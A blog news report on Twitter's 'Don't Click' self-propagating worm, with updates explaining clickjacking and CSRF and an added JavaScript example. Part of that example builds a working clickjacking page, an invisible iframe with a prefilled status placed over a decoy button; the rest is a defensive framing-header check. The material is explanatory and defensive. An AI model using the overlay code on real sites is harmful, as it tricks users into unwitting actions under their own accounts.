Don’t Click! No Really! Don’t Even Think About it!

Twitter is falling prey to a major security flaw right now. The service is getting swamped with messages that say “Don’t Click” followed by a URL. Apparently, this hack has been around for over two weeks, but it only really took off today. If you actually click on the link while you are logged into Twitter, another “Don’t Click” message is posted from your own Twitter account, which puts the link in front of your followers and keeps the cycle going.

Of course, this is also very smart social engineering. Who, after all, can resist clicking on a link that says “Don’t Click.”

No matter how annoying, though, it doesn’t look like this hack does anything more nefarious than post this message to your account. We will keep this post updated as we get more information.

Update I: Evan Williams just announced that Twitter is working on a fix right now and the messages have now finally stopped.

Update II: As one of our commenters points out below, this might also be a far simpler hack, in which the attacker overlays an invisible iframe containing the Twitter status update form on top of a decoy button (a technique known as clickjacking). While you think you are clicking on a link on another site, you are, in reality, clicking on the ‘Update’ button on Twitter, with the message already filled in. Looking at the screenshot above, that does indeed seem to be the case. Here is a good description of how this works in detail.
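To make the overlay concrete, here is an added example (it is not code from this article or from Twitter) showing the attacker-side page layout Update II describes, next to the check a browser makes today before it agrees to render a page inside a frame. The target URL and the `?status=` prefill parameter are assumptions used for illustration:

```javascript
// Added example, not code from the article or from Twitter: the clickjacking
// layout Update II describes, beside the framing check a browser makes today.
// The target URL and the ?status= prefill parameter are assumptions.

// Attacker side: a visible decoy button with a transparent, higher z-index
// frame of the target's update form positioned over it. The visitor sees
// "Don't Click"; the click lands on the framed form's submit button.
function buildClickjackPage(targetUrl, prefilledStatus) {
  const framedUrl = targetUrl + "?status=" + encodeURIComponent(prefilledStatus);
  return [
    "<!doctype html><html><body>",
    '<button style="position:absolute;top:120px;left:80px;z-index:1">Don\'t Click</button>',
    '<iframe src="' + framedUrl + '" scrolling="no"',
    '  style="position:absolute;top:0;left:0;width:640px;height:480px;',
    '         opacity:0;z-index:2;border:0"></iframe>',
    "</body></html>",
  ].join("\n");
}

// Defender side: may embedderOrigin frame a response carrying these headers?
// Mirrors browser precedence: a Content-Security-Policy frame-ancestors
// directive overrides X-Frame-Options; with neither header present (Twitter's
// state when the worm ran) framing is allowed.
function framingAllowed(headers, pageOrigin, embedderOrigin) {
  const h = {};
  for (const name of Object.keys(headers)) h[name.toLowerCase()] = headers[name];

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(d => d.trim())
      .find(d => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1); // empty list means 'none'
      return sources.some(src => matchesSource(src, pageOrigin, embedderOrigin));
    }
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return embedderOrigin === pageOrigin;
  return true; // no recognised policy: the browser renders the frame
}

// Match one CSP frame-ancestors source expression against the embedding origin.
// Handles 'none', 'self', '*', and host sources with an optional scheme and a
// leading wildcard label; ports are ignored for brevity.
function matchesSource(src, pageOrigin, embedderOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedderOrigin === pageOrigin;
  if (s === "*") return true;
  const embedder = new URL(embedderOrigin);
  const schemeSep = s.indexOf("://");
  if (schemeSep !== -1 && s.slice(0, schemeSep + 1) !== embedder.protocol) return false;
  const host = schemeSep === -1 ? s : s.slice(schemeSep + 3);
  if (host.startsWith("*.")) return embedder.hostname.endsWith(host.slice(1));
  return embedder.hostname === host;
}

// Stand-alone demonstration (constructed values).
console.log(buildClickjackPage("https://twitter.com/home", "Don't Click: http://tinyurl.example/x"));
console.log("unprotected page framable by evil.example:",
  framingAllowed({}, "https://twitter.com", "http://evil.example"));
console.log("with X-Frame-Options: DENY:",
  framingAllowed({ "X-Frame-Options": "DENY" }, "https://twitter.com", "http://evil.example"));
```

The fix Twitter shipped in 2009 was frame-busting JavaScript on its own pages; the header-based policy in `framingAllowed` is what a service would rely on now, and the `frame-ancestors` directive is the one to prefer since it is not subject to the script-disabling tricks that defeat frame-busting.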

Note: This was our first theory of how this hack worked; it turns out it was way simpler than this. According to Jeff Atwood, this hack could also be making use of a known security flaw called cross-site request forgery (CSRF). We are no security experts, but our understanding is that this hack forges a request from your browser to Twitter, and your browser sends it along with your Twitter login cookie as if you had made it yourself. This only works, as far as we can see, when a service like Twitter performs a sensitive action (like posting to Twitter) without verifying that the request actually came from its own pages, for example by checking a secret token that an outside site cannot know. If you visit a malicious web site while you are logged into a service that is vulnerable to this hack, the attacker can make your browser send a request that performs an action on your behalf without you ever knowing about it.
